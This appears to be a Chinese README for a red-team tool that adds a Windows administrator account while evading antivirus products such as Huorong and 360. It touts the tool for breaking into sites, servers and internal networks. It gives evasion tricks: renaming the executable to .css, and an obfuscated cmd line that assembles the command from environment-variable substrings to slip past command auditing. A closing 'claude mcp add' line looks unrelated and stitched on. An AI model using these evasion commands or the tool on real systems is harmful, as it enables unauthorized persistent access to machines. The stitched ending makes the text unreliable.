一款ByPassAV进行Windows账号一键添加的红队实战工具!助力RedTeam大佬快速日站日服务器日内网
执行失败的一定要多试几次!!!
如果通过命令行或者WebShell终端直接执行FFICreateAdminUser.exe有点蠢,很多设备会基于命令进行安全审计
因此可以将FFICreateAdminUser.exe改名为FFICreateAdminUser.css
执行命令:cmd.exe /c FFICreateAdminUser.css
但是还是有点蠢,建议使用如下命令执行,可以在很多场景下绕过
c%CommonProgramFiles(x86):~26,-8%%windir:~-4,1%.%LOCALAPPDATA:~5,1%xe /%PUBLIC:~-1,1%%ProgramFiles(x86):~16,1%FFICre%APPDATA:~-5,-4%%ProgramData:~12,-1%eAd%ProgramFiles:~9,1%inUs%HOMEPATH:~3,1%r.c%SystemRoot:~9%s

火绒 - 常规添加

火绒 - FFI绕过添加

火绒 - 文件扫描

360安全卫士 - 常规添加

360安全卫士 - FFI绕过添加

360安全卫士 - 文件扫描

| # | Logs | Time |
|---|---|---|
| 1 | 开发实现相关bypass | 2024.10.12 |
| 2 | 修复Bug,Fix@3had0w | 2026.05.21 |
$ claude mcp add FFICreateAdminUser \
-- python -m otcore.mcp_server <graph>